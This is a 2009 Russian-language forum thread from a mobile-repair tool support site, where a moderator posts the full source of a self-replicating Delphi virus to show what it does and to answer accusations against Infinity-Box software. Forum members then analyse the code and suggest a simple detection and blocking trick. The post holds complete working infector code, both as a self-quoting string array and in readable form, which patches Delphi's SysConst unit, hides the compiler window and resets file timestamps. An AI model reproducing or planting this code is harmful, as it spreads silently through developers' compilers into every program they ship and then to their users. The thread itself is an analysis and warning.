MCRF.RU

 
Вернуться   MCRF.RU > Официальные Форумы поддержки (Support Forums) > Infinity Box

Важная информация

Infinity Box Официальный русскоязычный форум поддержки продукта Infinity Box
Официальный сайт продукта www.infinity-box.com
Обновления Infinity Box
Обновления "ChineseMiracle"
Обновления MT62xx CPU Russian Language Pack Editor
Обновления ContentExtractor и ContentManager

На правах рекламы

Закрытая тема
 
Опции темы
Старый 06.07.2009, 01:13   #1
Модератор
 
Регистрация: 05.05.2006
Возраст: 40
Сообщений: 1,742
Рейтинг мнений: 544
Вес репутации: 267
IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100
Активность: 31% Активность: 31% Активность: 31%
По умолчанию Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Уважаемые пользователи и программеры,

Скажу сразу: всё нижесказанное может повлиять только на тех, кто программит на Delphi. Для тех, у кого Delphi на компе не установлен весь текст ниже не имеет никакого смысла.

Воизбежание дальнейших недоразумений и для предотвращения попыток недобросовестных конкурентов обвинить нас во всех тягчайших грехах какие только может придумать нездоровый мозг постараюсь прояснить имевшую место быть ситуацию.

В недавнем прошлом имела ситуация, описанная тов. Лазером тут:
http://forum.gsmhosting.com/vbb/show...96#post4590996

Безусловный респект тов. Лазеру за мониторинг всех последних версий Infinity-Box софта и за публично выданное предупреждение (хотя, конечно, такого рода предупреждения всяко проще давать в приватной беседе, тем более, что связаться со мной тов. Лазеру проще простого и я всегда буду рад пообщаться на различные темы).

Как выяснилось, имевшая место ситуация дала нездоровый повод для нездоровой дискуссии на нездоровом ресурсе (и лично я не удивлен, что именно там такая вот дискуссия возникла):
http://z3x-team.com/forum/topic.php?post=4149#post4149

Выражаю большую признательность френдам, давшим мне линк нездорового ресурса, который показывает, на что готовы идти люди в попытках очернить репутацию добропорядочных людей. Этот пример объективно показывает степень испорченности мозга тех, кто пользуется такого рода ситуациями для выражения своей истинной природы, как, впрочем, и полное отсутствие каких-либо навыков в чтениии элементарного исходного кода (тот, кто разберет приложенный исходный код и сравнит свои мысли с выводами, озвученными нездоровыми ртами сам увидит нулевую степень нездорового мозга).

Ниже приводится исходный текст, который каждый может проанализировать и увидеть, что именно зловредного он несет.
Специально не хочу давать тут каких-либо заключений по причине того, что лучше пусть кто-нибудь другой напишет резюме того, что именно данный код может и чего не может сделать, и сможет ли он сделать то, в чем пытаются обвинить нас нездоровые злобные карлики.

Я буду признателен всем, кто самостоятельно разберет код из аттача тов. Лазера.
Если кому будет удобнее разобрать код, который приведен в более читаемый вид, то привожу его тут.

Код:
uses windows;

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of',
'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');

function x(s:string):string;
var i:integer;
begin 
  for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39;
  result:=s;
end;

procedure re(s,d,e:string);
var f1,f2:textfile;
    h:cardinal;
    f:STARTUPINFO;
    p:PROCESS_INFORMATION;
    b:boolean;
    t1,t2,t3:FILETIME;
begin
  h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if h<>DWORD(-1) then
  begin
    CloseHandle(h);
    exit;
  end;
  {'I-}assignfile(f1,s);
  reset(f1);
  if ioresult<>0 then exit;
  assignfile(f2,d+'pas');
  rewrite(f2);
  if ioresult<>0 then begin closefile(f1); exit; end;

  while not eof(f1) do
  begin
    readln(f1,s);
    writeln(f2,s);
    if pos('implementation',s)<>0 then break;
  end;

  for h:= 1 to 1 do writeln(f2,sc[h]);
  for h:= 1 to 23 do writeln(f2,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');');
  for h:= 2 to 24 do writeln(f2,x(sc[h]));
  closefile(f1);
  closefile(f2);
  {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'));
  fillchar(f,sizeof(f),0);
  f.cb := sizeof(f);
  f.dwFlags := STARTF_USESHOWWINDOW;
  f.wShowWindow := SW_HIDE;
  b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p);
  if b then WaitForSingleObject(p.hProcess,INFINITE);
  MoveFile(pchar(d+'bak'),pchar(d+'dcu'));
  DeleteFile(pchar(d+'pas'));
  h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if  h=DWORD(-1) then exit;
  GetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
  h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);
  if h=DWORD(-1) then exit;
  SetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
end;

procedure st;
  var  k:HKEY;c:array [1..255] of char;
  i:cardinal;
  r:string;
  v:char;
begin
  for v:='4' to '7' do
    if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
    begin
      i:=255;
      if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
      begin
        r:='';
        i:=1;
        while c[i]<>#0 do
        begin
          r:=r+c[i];
          inc(i);
        end;
        re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
      end;
    RegCloseKey(k);
  end;
end;

begin
  st;
end.
p.s.
Чтобы такого не происходило в будущем ни с кем, будьте оченнь внимательны и осторожны при запуске каких-либо чужих приложений на своём ПК. Даже очень умные антивирусы не могут знать всего и могут пропустить что-то с виду очень простое.

p.p.s.
Для тех, кто хочет заработать себе плюсики поливанием грязью других: чтобы не показывать свою полную необразованность в следующий раз постарайтесь сначала подумать, и только потом уже пороть чушь про злой умысел уважаемых людей, которые подняли такой проект как Infinity-Box и держат её на высоте более 4 (четырех) лет. Как показывает практика, такого рода работа под силу только профессионалам высочайшей квалификации и безграничной работоспособности.

p.p.p.s.
Если кому-то еще по нездоровости придут в головы мысли типа "они воруют исходники", то рекомендую всем посмотреть всем мультфильм "Летучий корабль", там есть радикальный ответ на все вопросы, которые я могу себе задать по поводу каких-либо исходников. Ответ на вопрос где я беру то, что сам не могу сделать составляет всего одно слово и звучит сразу после вопроса Царя "Построишь летучий корабль ?".

@NoName®
С остальными-то всё понятно уже давно. Я последнее время думал, что у тебя интеллекта больше чем у прочих, а ты себя поставил в один ряд.
Неужели ты сам не был столь любопытен и не посмотрел, что именно за код был в аттаче ?
Если стал писать не посмотрев, то надо списать это на обычное стадное чувство, а если посмотрел и всёравно стал писать, то либо твоя программерская квалификация стремится к нулю либо я просто промолчу дальше, а остальные пусть догадаются сами.

@Sedy
Спросил бы у меня, я бы рассказал больше, понятнее и более квалифицированно.

Данный рекламный блок не показывается зарегистрированным пользователям

Последний раз редактировалось IHelper; 06.07.2009 в 01:41.
IHelper вне форума
На правах рекламы
Старый 06.07.2009, 01:37   #2
Сенсей
Действительный участник ассоциации уровня Инженер MCRF
 
Аватар для Viktor001
 
Регистрация: 20.10.2005
Возраст: 42
Сообщений: 1,831
Рейтинг мнений: 425
Вес репутации: 194
Viktor001 отключил(а) отображение уровня репутации
Очки: 29,466, Уровень: 99 Очки: 29,466, Уровень: 99 Очки: 29,466, Уровень: 99
Активность: 0% Активность: 0% Активность: 0%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от IHelper Посмотреть сообщение
Безусловный респект тов. Лазеру за мониторинг всех последних версий Infinity-Box софта и за публично выданное предупреждение
the_laser делал это не ради любопытства, а потому что появились жалобы об ошибках, при запуске Setool. Вот эта тема на МФ: http://www.mobile-files.ru/forum/sho...d.php?t=220294
Viktor001 вне форума
Пользователь добавил плюс
Старый 06.07.2009, 01:49   #3
Модератор
 
Регистрация: 05.05.2006
Возраст: 40
Сообщений: 1,742
Рейтинг мнений: 544
Вес репутации: 267
IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100
Активность: 31% Активность: 31% Активность: 31%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от Viktor001 Посмотреть сообщение
the_laser делал это не ради любопытства, а потому что появились жалобы об ошибках, при запуске Setool. Вот эта тема на МФ: http://www.mobile-files.ru/forum/sho...d.php?t=220294
Я не испытываю иллюзий по поводу того, что ему больше нечего делать, только постоянно мониторить чем я занимаюсь. Лично я знаю одно - я этого кода себе сам не добавлял, а добавлял кто-то из тех, программы кого я запускал у себя на компе без всякой опаски.
IHelper вне форума
Старый 06.07.2009, 02:11   #4
Сенсей
 
Аватар для PANUA
 
Регистрация: 19.11.2005
Возраст: 39
Сообщений: 1,867
Рейтинг мнений: 629
Вес репутации: 344
PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA
Очки: 48,979, Уровень: 100 Очки: 48,979, Уровень: 100 Очки: 48,979, Уровень: 100
Активность: 17% Активность: 17% Активность: 17%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

IHelper, Да на Дельфях программирует куча народу, отискать концы откуда взялся этот код - занятие практически нереальное, слишком много времени прошло У меня тоже сидела эта штука, и у Жеки, источником мог быть кто угодно, завтра проверю свой второй комп на наличии этого вируса, на нем я не пишу уже более 4-х месяцев.
__________________
При установке Linux не погибло ни одного пингвина,полегли только дятлы..
PANUA вне форума
Старый 06.07.2009, 03:07   #5
Модератор
 
Регистрация: 05.05.2006
Возраст: 40
Сообщений: 1,742
Рейтинг мнений: 544
Вес репутации: 267
IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100
Активность: 31% Активность: 31% Активность: 31%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от PANUA Посмотреть сообщение
IHelper, Да на Дельфях программирует куча народу, отискать концы откуда взялся этот код - занятие практически нереальное, слишком много времени прошло У меня тоже сидела эта штука, и у Жеки, источником мог быть кто угодно, завтра проверю свой второй комп на наличии этого вируса, на нем я не пишу уже более 4-х месяцев.
Смысла искать концы не вижу т.к. ясно, что сделал это либо кто-то совсем неизвестный либо кто-то очень далекий от тех, кто тут на форуме общается.
Цель поста только одна - чтобы кто-нибудь (не я) описал что именно данный код делает, чтобы ни у кого не возникало в будущем желания делать умный вид и пороть чушь про "специально сделанные вирусы" и т.д.

Последний раз редактировалось IHelper; 06.07.2009 в 03:09.
IHelper вне форума
Старый 06.07.2009, 03:24   #6
Участник
 
Аватар для ravt
 
Регистрация: 16.02.2007
Возраст: 27
Сообщений: 1,309
Рейтинг мнений: 623
Вес репутации: 176
ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt
Очки: 25,739, Уровень: 96 Очки: 25,739, Уровень: 96 Очки: 25,739, Уровень: 96
Активность: 0% Активность: 0% Активность: 0%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от IHelper Посмотреть сообщение
Цель поста только одна - чтобы кто-нибудь (не я) описал что именно данный код делает,
Простым языком:
Данный код ищет установленна ли в системе Delphi от 4 до 7 версии.
Если он находит Delphi, он создает копию Sysconst.dcu в виде sysconst.Bak , и патчит sysconst.dcu добавляя себя.
В итоге любая программа написанная на "заражонной" машине, будет иметь уже этот код.

Проверить загаженная машина или нет, проще всего посмотрев есть ли в папке Delphi\lib файл sysconst.Bak
Избавится тоже просто, создаем обычный файл sysconst.Bak, и тогда даже если запустить "заражонную" программу то патчить sysconst.dcu не будет.

Больше злых деяний я не обнаружил, но я и не являюсь экспертом в данном вопросе, я только учусь.
ravt вне форума
4 пользователя(ей) добавили плюсы
BelMobi (06.07.2009), Habib (06.07.2009), NoName® (07.07.2009), Slon (08.07.2009)
Старый 06.07.2009, 10:50   #7
Сенсей
 
Регистрация: 26.07.2005
Возраст: 31
Сообщений: 690
Рейтинг мнений: 293
Вес репутации: 97
tevel tevel tevel tevel tevel tevel tevel tevel tevel tevel tevel
Очки: 8,491, Уровень: 62 Очки: 8,491, Уровень: 62 Очки: 8,491, Уровень: 62
Активность: 0% Активность: 0% Активность: 0%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

именно так. похоже просто на болванку
tevel вне форума
Старый 06.07.2009, 14:21   #8
Модератор
 
Аватар для uo5oq
 
Регистрация: 21.07.2005
Возраст: 43
Сообщений: 2,353
Рейтинг мнений: 854
Вес репутации: 362
uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100
Активность: 72% Активность: 72% Активность: 72%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Рома, а какую цель мог преследовать написавший этот вирус?
Цитата:
Сообщение от ravt Посмотреть сообщение
В итоге любая программа написанная на "заражонной" машине, будет иметь уже этот код.
uo5oq на форуме
Старый 06.07.2009, 14:27   #9
Участник
 
Аватар для ravt
 
Регистрация: 16.02.2007
Возраст: 27
Сообщений: 1,309
Рейтинг мнений: 623
Вес репутации: 176
ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt
Очки: 25,739, Уровень: 96 Очки: 25,739, Уровень: 96 Очки: 25,739, Уровень: 96
Активность: 0% Активность: 0% Активность: 0%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Кроме самоутверждения, больше ни какой.
Показать что вот я могу, и антивирус пропускает и сам себя копирует...
Ну красть сырцы однозначно этот код не сможет
Хотя код интересный, и в умелых руках может беды наделать.
ravt вне форума
Пользователь добавил плюс
NoName® (07.07.2009)
Старый 06.07.2009, 15:20   #10
Модератор
 
Аватар для uo5oq
 
Регистрация: 21.07.2005
Возраст: 43
Сообщений: 2,353
Рейтинг мнений: 854
Вес репутации: 362
uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100
Активность: 72% Активность: 72% Активность: 72%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от ravt Посмотреть сообщение
Кроме самоутверждения, больше ни какой.
Не совсем так.
Почитал, что Серега написал на хостинге, так это по сути - плацдарм для дальнейшего внедрения любого своего кода, например для плагиата.

И тогда по поводу авторства, предположеного IHelper-ом, не остаётся сомнений

Последний раз редактировалось s.Mobi; 06.07.2009 в 15:47.
uo5oq на форуме
Пользователь добавил минус
NoName® (07.07.2009)
Старый 06.07.2009, 18:48   #11
Модератор
 
Регистрация: 05.05.2006
Возраст: 40
Сообщений: 1,742
Рейтинг мнений: 544
Вес репутации: 267
IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100
Активность: 31% Активность: 31% Активность: 31%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от uo5oq Посмотреть сообщение
Почитал, что Серега написал на хостинге, так это по сути - плацдарм для дальнейшего внедрения любого своего кода, например для плагиата.
Лично я не вижу тут плацдарма после того, как тов. Лазер опубликовал код. Кроме как удовлетворения чьих-то амбиций (что у него само собой длиннее, чем у Касперского) тут больше ничего нет.

Цитата:
Сообщение от uo5oq Посмотреть сообщение
И тогда по поводу авторства, предположеного IHelper-ом, не остаётся сомнений
Я не предполагал никакого авторства, понять кто это сделал у меня фантазии не хватит, т.к. нахвататься такого "подарка" мог кто угодно где угодно.
IHelper вне форума
Пользователь добавил плюс
NoName® (07.07.2009)
Старый 06.07.2009, 19:29   #12
Модератор
 
Аватар для uo5oq
 
Регистрация: 21.07.2005
Возраст: 43
Сообщений: 2,353
Рейтинг мнений: 854
Вес репутации: 362
uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100
Активность: 72% Активность: 72% Активность: 72%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от IHelper Посмотреть сообщение
Лично я не вижу тут плацдарма после того, как тов. Лазер опубликовал код.
Мог и не публиковать.
Цитата:
Сообщение от IHelper Посмотреть сообщение
Кроме как удовлетворения чьих-то амбиций (что у него само собой длиннее, чем у Касперского) тут больше ничего нет..
Амбиции, совершенно у всех ex: советских и соц. лагерных программеров завышеные. Это нестрашно, и обычно с возрастом проходит.
Цитата:
Сообщение от IHelper Посмотреть сообщение
Я не предполагал никакого авторства...
Возможно мне показалось.
uo5oq на форуме
Старый 06.07.2009, 19:40   #13
Модератор
 
Регистрация: 05.05.2006
Возраст: 40
Сообщений: 1,742
Рейтинг мнений: 544
Вес репутации: 267
IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100 Очки: 36,921, Уровень: 100
Активность: 31% Активность: 31% Активность: 31%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от uo5oq Посмотреть сообщение
Мог и не публиковать.
Мог

Цитата:
Сообщение от uo5oq Посмотреть сообщение
Амбиции, совершенно у всех ex: советских и соц. лагерных программеров завышеные. Это нестрашно, и обычно с возрастом проходит.
Скорее не у всех и не с возрастом, а у тех, которые не могут превратить свою "умность-амбициозность" в более полезные вещи (например типа денег).
IHelper вне форума
Старый 06.07.2009, 19:48   #14
Модератор
 
Аватар для uo5oq
 
Регистрация: 21.07.2005
Возраст: 43
Сообщений: 2,353
Рейтинг мнений: 854
Вес репутации: 362
uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100
Активность: 72% Активность: 72% Активность: 72%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)


ОФФтопик:
Цитата:
Сообщение от IHelper Посмотреть сообщение
Скорее не у всех и не с возрастом, а у тех, которые не могут превратить свою "умность-амбициозность" в более полезные вещи (например типа денег).
Согласен.
От безисходности они переключаются на банальный плагиат, что позволяет им демпинговать и слегка мешать зарабатывать нормальным людям

uo5oq на форуме
Пользователь добавил минус
NoName® (08.07.2009)
Старый 07.07.2009, 14:29   #15
MCRF Инженер
 
Аватар для pasha_zv
 
Регистрация: 04.10.2005
Возраст: 39
Сообщений: 233
Рейтинг мнений: 73
Вес репутации: 76
pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv
Очки: 5,440, Уровень: 47 Очки: 5,440, Уровень: 47 Очки: 5,440, Уровень: 47
Активность: 3% Активность: 3% Активность: 3%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от ravt Посмотреть сообщение
Кроме самоутверждения, больше ни какой.
Показать что вот я могу, и антивирус пропускает и сам себя копирует...
Ну красть сырцы однозначно этот код не сможет
Хотя код интересный, и в умелых руках может беды наделать.
ничего, кодик прикольный, счас у себя на дельфи крутанул

но насчет сырцов - увольте
ИБО- все нормальные программеры после завершения работы
экзешник пакуют, хоть EXEPack - ом
по причине экономии места у пользователя,
а также по некоторым другим соображениям ))
причем некоторые даже используют самостоятельно разработанные упаковщики
... со встроенный алгоритмом антиотладки, например обрывания или использования INT1, INT3,
или хранения в таймере некоторых параметров ))

Последний раз редактировалось pasha_zv; 07.07.2009 в 14:30.
pasha_zv вне форума
Старый 07.07.2009, 17:25   #16
Супер Модератор
 
Аватар для FractalizeR
 
Регистрация: 20.06.2006
Возраст: 28
Сообщений: 380
Рейтинг мнений: 310
Вес репутации: 99
FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR
Очки: 11,562, Уровень: 70 Очки: 11,562, Уровень: 70 Очки: 11,562, Уровень: 70
Активность: 10% Активность: 10% Активность: 10%
Exclamation Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от uo5oq Посмотреть сообщение
Рома, а какую цель мог преследовать написавший этот вирус?
Можно предположить, что это тест нового способа распространения своего вируса. На этот раз через программистов, а не через пользователей. Кроме того, насколько я знаю, современные антивирусы не детектируют вирусы по их исходному коду на Дельфи. Поэтому фактически получилась гремучая смесь. Помните "Крепкий орешек"? Две безобидные разноцветные жидкости спокойно так себе лежат друг рядом с другом... Но стоит их соединить, как... БУМ! Так и тут. Исходник вируса никому не опасен и никаких деструктивных действий не производит. Однако стоит его соединить с Дельфи (скомпилировать на зараженной машине любую программу, даже "Hello World") как... БУМ! Мы получаем работоспособный вирус внедренный во вполне себе такую легальную программу. Идея недурна... Особенно учитывая, что разработчики имеют тенденцию скомпилированные программы потом размещать на своих сайтах или давать другим разработчикам.... Сами понимаете...
FractalizeR на форуме
Пользователь добавил плюс
NoName® (07.07.2009)
Старый 07.07.2009, 18:55   #17
Модератор
 
Аватар для uo5oq
 
Регистрация: 21.07.2005
Возраст: 43
Сообщений: 2,353
Рейтинг мнений: 854
Вес репутации: 362
uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100 Очки: 66,964, Уровень: 100
Активность: 72% Активность: 72% Активность: 72%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от FractalizeR Посмотреть сообщение
Можно предположить, что это тест нового способа распространения своего вируса.
Я именно так и предположил http://www.mcrf.ru/forum/showpost.ph...9&postcount=10

P.S. На воре и шапка горит (старинная Русская пословица).
uo5oq на форуме
Пользователь добавил минус
NoName® (08.07.2009)
Старый 07.07.2009, 21:06   #18
MCRF Инженер
 
Регистрация: 02.05.2005
Возраст: 35
Сообщений: 547
Рейтинг мнений: 114
Вес репутации: 88
slav-on slav-on slav-on slav-on slav-on slav-on slav-on slav-on slav-on slav-on
Очки: 10,340, Уровень: 67 Очки: 10,340, Уровень: 67 Очки: 10,340, Уровень: 67
Активность: 0% Активность: 0% Активность: 0%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Будет гораздо хуже, если это проникнет в другие языки на которых пробуют писать студенты и программисты-самоучки
Как сказал FractalizeR сырой код не отслеживают (яркий пример -наличие вирусов в линаксе)
slav-on вне форума
Старый 07.07.2009, 21:53   #19
Участник
 
Аватар для ravt
 
Регистрация: 16.02.2007
Возраст: 27
Сообщений: 1,309
Рейтинг мнений: 623
Вес репутации: 176
ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt
Очки: 25,739, Уровень: 96 Очки: 25,739, Уровень: 96 Очки: 25,739, Уровень: 96
Активность: 0% Активность: 0% Активность: 0%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Ну начнем стого что Delphi, довльно мощный язык, и пишут на нем многие я даже думаю больше чем на С.
Да и в мире GSM продуктов преаблодает именно этот язык, вот софт котрый написан на Delphi:
UFS
Infinity
LangPackEditor от sMobi.
SeTool
SMTi
Vigys
Весь Z3х
USB-Smart
UBL
Rocker
JAF
Cinek
MultiBox
ContentExtractor от PANUA
и многие проэкты от неизвестных команд.
Обусловленно это простым синтаксисом, при довльно мощных возможностях.
ravt вне форума
Пользователь добавил плюс
NoName® (08.07.2009)
Старый 07.07.2009, 22:55   #20
Член группы поддержки продукта
 
Регистрация: 17.05.2006
Возраст: 26
Сообщений: 733
Рейтинг мнений: 330
Вес репутации: 139
NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName®
Очки: 19,070, Уровень: 87 Очки: 19,070, Уровень: 87 Очки: 19,070, Уровень: 87
Активность: 27% Активность: 27% Активность: 27%
По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)

Цитата:
Сообщение от ravt Посмотреть сообщение
на Delphi:
JAF
MultiBox
JAF Кажется весь на MSVC писан
MultiBox Смесь Delphi/CBuilder , но это не столь важно. А вот если конкретно искать откуда пошёл сорс вирус достаточно собрать
по нескольео релизов от всех комманд и посмотреть где он вирь явился первее.



Цитата:
Сообщение от uo5oq Посмотреть сообщение
Я именно так и предположил http://www.mcrf.ru/forum/showpost.ph...9&postcount=10

P.S. На воре и шапка горит (старинная Русская пословица).
Доказательства в студию Павел
__________________

Последний раз редактировалось NoName®; 07.07.2009 в 23:01.
NoName® вне форума
Закрытая тема

Закладки

На правах рекламы


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Cмеемса =)) (рассказы) PGP ** OFFTOPIC ** 40 12.02.2006 21:49


Часовой пояс GMT +4, время: 11:25.


Project by PGP. Перевод: zCarot
Powered by vBulletin®. ©2000 - 2010, Jelsoft Enterprises Ltd.
Template-Modifications by TMS